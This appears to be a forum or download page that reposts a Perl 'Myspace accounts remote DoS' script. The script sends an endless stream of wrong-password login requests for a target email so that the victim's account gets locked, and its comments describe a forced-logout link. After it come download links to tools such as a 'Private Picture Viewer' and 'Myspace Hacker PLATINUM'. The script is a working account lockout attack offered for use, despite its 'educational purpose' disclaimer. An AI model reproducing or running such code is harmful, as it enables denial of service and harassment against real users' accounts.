Myspace dos script
Код:
#!/usr/bin/perl
#
# Myspace accounts remote DoS
# by: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
# 10 april 2007
# MorX Security Research Team
# www.morx.org
#
# Details:
#
# this vulnerability is similar to the one msn suffers from which's
# still unfixed til now.
#
#
# in short vulnerability consists on sending a certain number of wrong
# password attempts which makes the myspace stupid server block the
# victim account instead of blocking the IP where from the attack
# is coming from.
#
# The attack must start before the victim logs in, if the user is already
# logged in then once they sign out they wont be able to sign back
#
# Or the victim can be logged out easly if the attacker get them
# to click on a link, example:
#
# http://collect.myspace.com/index.cfm?fuseaction=signout&MyToken=123f0a9d-4c1a-46d0-b97b-f6d052b01234
#
# Myspace made it easier since MyToken can be anything or doesnt even need to be sent
#
# That's it,
#
# Enjoy, from Morocco.
#
# Disclaimer:
#
# this entire document and/or code is for eductional, testing and demonstrating
# purpose only.
# Modification use and/or publishing this information is entirely on
# your OWN risk, I cannot be held responsible for anything on this entire document.
use IO::Socket;
if(!defined($ARGV[0])) {
system (clear);
print "\n";
print "===================================================\n";
print "--- Myspace accounts remote DoS by simo_at_morx_org\n";
print "--- Contact: simo_at_morx_dot_org\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "===================================================\n";
print "--- Usage: perl $0 <Target_Email>\n\n";
exit; }
# set these values to whatever the hell your mind tells you unless
# you dont know what you are doing
$TARGET = $ARGV[0];
$PORT = "80";
$SERVER = "login.myspace.com";
$PASSWORD = "~censored~";
$NUMBER = "999999999999999999999999999999999";
#################################
$A = "POST /index.cfm?fuseaction=login.process&MyToken=50b3f101-eadb-4043-bfc6-be6dbb69b12c HTTP/1.1";
$B = "Host: login.myspace.com";
$C = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
$D = "Connection: close";
$E = "Content-Type: application/x-www-form-urlencoded";
$G = "Login=&email=$TARGET&password=$PASSWORD&ctl00%24Main%24SplashDisplay%24loginold%24loginbutton.x=44&ctl00%24Main%24SplashDisplay%24loginold%24loginbutton.y=7";
print "\n";
print "===================================================\n";
print "--- Myspace accounts remote DoS by simo_at_morx_org\n";
print "--- Contact: simo_at_morx_dot_org\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "===================================================\n";
print "[+] Attacking $TARGET ...\n";
print "[-] CTRL + C To Stop\n";
for($count=0;$count<=$NUMBER;$count++)
{
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT")
|| die "Can't connect to $SERVER";
print $remote "$A\n$B\n$C\n$D\n$E\nContent-Length: ". length($G) ."\n\n$G\n\n";
$remote->autoflush();
}
print "Done, try again if needed :D";
exit;Myspace Music Stealer
Скачать!
MySpace Profiler
MySpace Profiler
Cкачать!
Myspace Massive Friend Adder
Myspace Massive Friend Adder
Cкачать!
Myspace Private Picture Viewer
Myspace Private Picture Viewer
Cкачать!
Myspace Hacker PLATINUM (pri8)
Cкачать!